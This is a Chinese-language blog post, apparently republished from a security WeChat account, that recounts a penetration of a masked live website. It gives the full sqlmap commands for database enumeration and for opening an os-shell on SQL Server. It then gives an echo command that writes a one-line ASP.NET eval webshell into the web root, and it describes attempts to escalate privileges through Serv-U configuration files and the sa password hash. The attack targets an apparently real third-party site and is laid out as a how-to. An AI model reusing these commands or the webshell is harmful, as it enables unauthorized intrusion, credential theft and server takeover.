登陆 注册

记一次渗透过程中用sqlmap写shell

萧寒 2019-06-22 渗透测试Sqlmapshell

第一步

拿到注入点:

http://xxxxx.com/zxxxxx.aspx?zid=16

为了防止被爆菊被和谐,这里的网址采取硬核马赛克措施 – –

sqlmap.py–u“http://xxxxx.com/zpDetails.aspx?zid=16” –dbs

--dbs查了一下数据库

估计是一个小站群,数据库不少,然后列一下数据库的管理员账号

sqlmap.py–u“http://xxxxx.com/zpxxxxils.aspx?zid=16” –users

这里看到了一个sa用户,嗯,有亮点!不过暂时也用不到,后面讲到提权的时候会提到sa

然后正常流程 爆表,爆库,爆字段

但是管理员密码为空,所以暂时无果,

最重要的是!! 后台怎么着都找不到

所以我想到了直接向网站里写shell

Os-shell 交互式shell命令

网上一搜os-shell教程一大堆,可我看了很多博文,大部分都是针对MySQL进行的os-shell写shell

什么选择语言啊,什么找物理路径啊,什么生成临时马的

但是通过上面的截图相信你们也看到了,数据库是SQL server的数据库

sqlmap.py–u“http://xxxxx.com/zpxxxxils.aspx?zid=16” –os-shell

如图,sql server下,我们进入了os-shell的命令行模式

本来第一个思路是,用dir命令查找一下网站后台,以及用type命令查看一下config文件看看能不能找到可用的有效信息。

但是 !比较坑的是,常规方法找不到物理路径

所以接下来的思路,我们先用dir命令列一下目录,试图寻找可分析的网站目录

注意红框所示,上文提到过,服务器可能是一个小站群,所以我们可以先找到其他网站的目录,并测试语句是否可写以及网站路径的真实有效性

1.测试网站真实目录

生成文件测试   使用echo命令:

echo“thisistest”>d:\matata\t1.txt

在网站根目录下生成t.txt文件。内容为thisis test。

不难看到,写入文件测试成功

2.生成shell文件

在os-shell中执行命令:echo命令

echo ^<%@PageLanguage=”Jscript”%^>^<%eval(Request.Item[“pass”],”unsafe”);%^> > d:\matata\test.aspx

一句话写入成功,菜刀进行连接

二、提权

1.Systeminfo进行查询系统信息

2.对比漏洞库查找可用exp

但,以上提权均不成功

3.Serv-u服务

默认43598端口没有开,但是很明显是用了serv-u的服务

故通过tasklist和netstat –ano 对比监听端口情况,

最后分析出了serv-u的服务端口为5460

再通过查找serv-u文件夹里的\Serv-U\ServUDaemon.ini 配置文件查找ftp账号和密码

通过大马提权,未果!

猜测可能是可写目录的问题

最后这边又有一个思路(社工思想),通过net user

猜测上文提到的数据库sa的密码可能与某管理员账号对应

回头去跑了一下sa的hash值,最后各种解密网站解密不成功,

提权的过程就先告一段落。

纯菜鸟操作,大佬勿喷

推荐阅读:

soap注入某sql2008服务器结合msf进行提权

https://www.cnblogs.com/ichunqiu/archive/2018/06/05/9140524.html

参考来源:jazz'blog

作者:jazz

文由微信公众号HACK学习呀


生成海报
请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net